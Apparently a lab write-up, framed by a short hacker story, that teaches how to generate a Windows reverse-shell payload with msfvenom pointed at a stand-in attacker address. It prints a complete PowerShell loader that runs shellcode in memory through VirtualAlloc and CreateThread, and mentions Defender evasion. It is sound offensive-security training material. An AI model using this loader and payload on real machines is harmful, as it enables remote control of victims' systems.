A Hacker’s Lesson: Writing Shellcode and Creating a Reverse Shell
Glitch, a skilled but mistrusted hacker, was prepping for a tech conference. He was eager to share his shellcode script that remotely accessed his home system. As he worked, he noticed Mayor Malware's henchmen lurking nearby.
"They're wasting their time. I don't have anything they'd want," Glitch chuckled.
He didn't realise that hidden in his home system was something they desperately sought—a research paper he wrote on Wareville's defences, a treasure Mayor Malware was eager to obtain.
Learning Objectives
Through this blog, you’ll:
Understand the basics of writing shellcode.
Learn to generate shellcode for reverse shells.
Execute shellcode using PowerShell.
What is Shellcode?
Shellcode is a snippet of code, typically written in assembly language, used by attackers to exploit vulnerabilities in systems. It allows them to inject commands and gain control over compromised machines. Though commonly associated with malicious activities, shellcode is a vital concept for ethical hacking and penetration testing.
Key Terminologies
PowerShell
PowerShell is a versatile scripting tool for Windows systems. While administrators use it for legitimate automation tasks, attackers exploit its deep system integration to execute malicious scripts stealthily.
Windows Defender and Bypass Techniques
Windows Defender scans code to block malware. To evade detection, attackers use:
Obfuscation: Hiding malicious patterns.
Reflective Injection: Running code directly in memory, bypassing signature-based defenses.
Windows API
The Windows Application Programming Interface (API) enables interaction with system-level functions like memory management and file operations. Exploits often leverage API functions such as VirtualAlloc
, CreateThread
, and WaitForSingleObject
to execute shellcode effectively.
Reverse Shells
In a reverse shell, the target machine initiates a connection back to the attacker’s system. This technique is pivotal for remote exploitation, enabling attackers to control the compromised device.
Generating Shellcode
To generate a reverse shell, we use msfvenom, a powerful tool for creating payloads. Here's the command:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKBOX_IP LPORT=1111 -f powershell
-p
: Specifies the payload type (reverse shell for Windows).LHOST
: The attacker's IP address.LPORT
: The port on the attacker’s machine to listen for connections.-f
: Specifies the output format (PowerShell script).
Sample Output
The command generates a PowerShell script containing the shellcode:
[Byte[]] $buf = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31...
Executing Shellcode
To run shellcode, it must be loaded into memory and executed. Below is a PowerShell script that uses Windows API functions for this process:
PowerShell Script
$VrtAlloc = @"
using System;
using System.Runtime.InteropServices;
public class VrtAlloc{
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
}
"@
Add-Type $VrtAlloc
$WaitFor = @"
using System;
using System.Runtime.InteropServices;
public class WaitFor{
[DllImport("kernel32.dll", SetLastError=true)]
public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
}
"@
Add-Type $WaitFor
$CrtThread = @"
using System;
using System.Runtime.InteropServices;
public class CrtThread{
[DllImport("kernel32", CharSet=CharSet.Ansi)]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
}
"@
Add-Type $CrtThread
[Byte[]] $buf = SHELLCODE_PLACEHOLDER
[IntPtr]$addr = [VrtAlloc]::VirtualAlloc(0, $buf.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $buf.Length)
$thandle = [CrtThread]::CreateThread(0, 0, $addr, 0, 0, 0)
[WaitFor]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")
Script Breakdown
VirtualAlloc
: Allocates memory for the shellcode.Marshal.Copy
: Copies the shellcode into the allocated memory.CreateThread
: Starts a thread to execute the shellcode.WaitForSingleObject
: Waits for the shellcode execution to complete.
Conclusion
Working with shellcode is like walking a tightrope—it’s both fascinating and dangerous. Glitch’s experience shows just how easy it is for things to go sideways if you’re not careful. The tools we use, like msfvenom
and PowerShell, are incredibly powerful, but they also need a good dose of respect.
This isn’t just about running commands and hoping for the best; it’s about understanding what’s happening under the hood—allocating memory, copying bytes, starting threads. Each step matters. And then there’s the bigger picture: keeping sensitive data safe and staying one step ahead of whoever’s trying to get their hands on it.